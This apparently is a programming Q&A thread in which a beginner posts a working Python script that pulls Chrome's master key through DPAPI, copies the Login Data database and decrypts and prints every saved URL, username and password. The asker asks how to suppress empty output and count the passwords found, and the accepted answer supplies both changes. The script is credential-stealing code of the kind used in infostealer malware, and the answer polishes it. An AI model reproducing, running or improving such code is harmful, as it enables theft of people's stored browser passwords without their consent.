# Python how to remove unnecessary prints

Tags: python

Hello Im new at python and i want remove junk prints in my code (I have indicated the problem in the picture.):

```
import os
import json
import base64
import sqlite3
import win32crypt
from Crypto.Cipher import AES
import shutil

#ChromeDecoder
print("--------------------| Google Chrome |--------------------")
def get_master_key():
    with open(os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User Data\Local 
State', "r", encoding='utf-8') as f:
    local_state = f.read()
    local_state = json.loads(local_state)
master_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
master_key = master_key[5:]  # removing DPAPI
master_key = win32crypt.CryptUnprotectData(master_key, None, None, None, 0)[1]
return master_key


def decrypt_payload(cipher, payload):
    return cipher.decrypt(payload)


def generate_cipher(aes_key, iv):
    return AES.new(aes_key, AES.MODE_GCM, iv)


def decrypt_password(buff, master_key):
    try:
        iv = buff[3:15]
        payload = buff[15:]
        cipher = generate_cipher(master_key, iv)
        decrypted_pass = decrypt_payload(cipher, payload)
        decrypted_pass = decrypted_pass[:-16].decode()  # remove suffix bytes
        return decrypted_pass
    except Exception as e:
        # print("Probably saved password from Chrome version older than v80\n")
        # print(str(e))
        return "Chrome < 80"



if __name__ == '__main__':

    master_key = get_master_key()
    login_db = os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User 
Data\default\Login Data'
    shutil.copy2(login_db, "Loginvault.db") #making a temp copy since Login Data DB is locked 
while Chrome is running
    conn = sqlite3.connect("Loginvault.db")
    cursor = conn.cursor()

    try:
        cursor.execute("SELECT action_url, username_value, password_value FROM logins")
        for r in cursor.fetchall():
            url = r[0]
            username = r[1]
            encrypted_password = r[2]
            decrypted_password = decrypt_password(encrypted_password, master_key)
            print("[+] Password Found !!!" + "\n" +"URL: " + url + "\nUser Name: " + username + "\nPassword: " + decrypted_password + "\n")
except Exception as e:
    pass

cursor.close()
conn.close()
try:
    os.remove("Loginvault.db")
except Exception as e:
    pass
```

Its works but i have a problem:
[enter image description here](https://i.stack.imgur.com/7Xd61.png)

I see so much spaces and how i can remove them?

Also is there a way to count found passwords in this format?

```
print("[+] 100 passwords have been found.")
```

Sorry for bad English... Thank you.

Answer (score 0, accepted):

You can check for empty str also `f"text {variable}"` is much better for reading.If you want check other values just ad `and var != ""`

```py
if url != "":
    print(f"[+] Password Found !!!\nURL: {url}\nUser Name: {username}\nPassword: {decrypted_password}\n")
```

2:
before for loop ad `count=0`
and in loop into `if url != "":` ad

```py
count += 1
```